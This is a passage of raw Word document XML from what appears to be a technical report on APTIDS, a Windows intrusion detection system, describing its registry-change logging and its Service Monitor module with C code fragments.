        <w:t>In the situation when nCount &lt;= 0, the last value in the chain is suspicious. In case nCount &lt; 0, we log the value which is in the last position of the current value chain. When nCount = 0, if the name of value in the last position in the current query is different from that name in the previous query, we log that last subkey. RegQuery does nothing on other situations.</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((cValues - 1 == i) &amp;&amp; aft &amp;&amp; (cValues &gt; *nValues)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);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wcscpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer, wchTime);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 New value added at Key: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wchLogKey);</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  --&gt;Value Name added :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achValue);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  --&gt;Value Data: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(LPWSTR)lpValueData);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));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((cValues - 1 == i) &amp;&amp; aft &amp;&amp; (*nValues == cValues)) {</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L"Last Value: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpLastValueName);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//If the name of the value in the last position is different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//from the previous query</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wcscmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastValueName, achValue)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);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wcscpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer, wchTime);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 New value modified at Key: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wchLogKey);</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  --&gt;Value Name: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achValue);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  --&gt;Value Data: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(LPWSTR)lpValueData);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));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C60196" w:rsidRDefault="004829A7" w:rsidP="004829A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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="004829A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9B2BE7" w:rsidRDefault="009B2BE7" w:rsidP="009B2BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="008F0F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2BE7" w:rsidRDefault="008F0F14" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_Toc485303747"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor Module’s source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00054518" w:rsidRDefault="00054518" w:rsidP="008F0F14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>APTIDS implements Service Monitoring module for identifying and capturing any anomalous behavior occurs to Windows Services. APTIDS calls “SvcChangeNotify” as an independent thread to perform service monitoring tasks.</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SvcChangeNotify(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</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EVT_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> subscriptionHandle;</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SC_HANDLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> scManagerHandle;</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notifyEventHandle;</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SERVICE_NOTIFYW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> notifyBuffer;</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dwResult;</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hHeap;</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SECURITY_ATTRIBUTES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> secAttribute;</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hHeap = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>HeapCreate(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">0,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 0);</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 xml:space="preserve"> * pstCallbackContext </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HeapAlloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hHeap, </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sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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8F0F14" w:rsidRDefault="00054518" w:rsidP="00F73C0C">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t>pstCallbackContext-&gt;wchLogBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 1);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="008F0F14" w:rsidRDefault="002565A7" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004829A7" w:rsidRDefault="00F73C0C" w:rsidP="004829A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SvcChangeNotify defines some variables for its functionalities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73C0C" w:rsidRPr="00F73C0C" w:rsidRDefault="00F73C0C" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">subscriptionHandle: An event subscription handle which is used for creating a subscription that </w:t>
      </w:r>
      <w:r w:rsidRPr="00F73C0C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>will receive current and future events from a channel or log file that mat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">ch the specified query criteria specifying in the calling function named “EvtSubcribe”. </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subscriptionHandle = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>EvtSubscribe(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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L"System"</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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>System[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Provider[@Name='Service Control Manager']]]"</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SubscribeCallback,</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F4F4F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>EvtSubscribeToFutureEvents</w:t>
      </w:r>
      <w:r w:rsidRPr="00F73C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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F73C0C" w:rsidRDefault="00F73C0C" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>EvtSubscribe is a Windows API used for creating a subscription, the channel in this context is “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>System”  and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the XPath query is “*[System[Provider [@Name=’Service Control Manager’]]]” which indicates that this is a subscription for the Service Control Manager which is belong to the System.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F73C0C" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>scManagerHandle: A handle for Service Control Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>notifyEventHandle: An event handle for notifying change happening to SCM. This handle is used later by NotifyServiceStatusChange and WaitForSingle Object to capture SCM events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">notifyBuffer: An object of the struct SERVICE_NOTIFYW which stores information for using in the functionalities of NotifyServiceStatusChange. notifyBuffer stores some essential information such as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A number indicating the version in use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC1E10" w:rsidRDefault="00FC1E10" w:rsidP="00FC1E10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A pointer to the callback function used for handling SCM events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRPr="00A90303" w:rsidRDefault="00FC1E10" w:rsidP="00A90303">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A callback context which stores arguments for passing to the callback function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052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10"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;notifyBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(SERVICE_NOTIFYW));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052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10"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">notifyBuffer.dwVersion = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>SERVICE_NOTIFY_STATUS_CHANGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052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10"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>notifyBuffer.pfnNotifyCallback = &amp;NotifyCallback;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A90303" w:rsidRDefault="00A90303" w:rsidP="002052C4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>notifyBuffer.pContext = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90303">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> CALLBACK_CONTEXT*) pstCallbackContext;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00A90303" w:rsidRDefault="002565A7" w:rsidP="002052C4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="710"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002052C4" w:rsidRPr="002052C4" w:rsidRDefault="00A90303" w:rsidP="002052C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">secAttribute: An object of SECURITY_ATTRIBUTES struct </w:t>
      </w:r>
      <w:r w:rsidR="001D2799">
        <w:rPr>
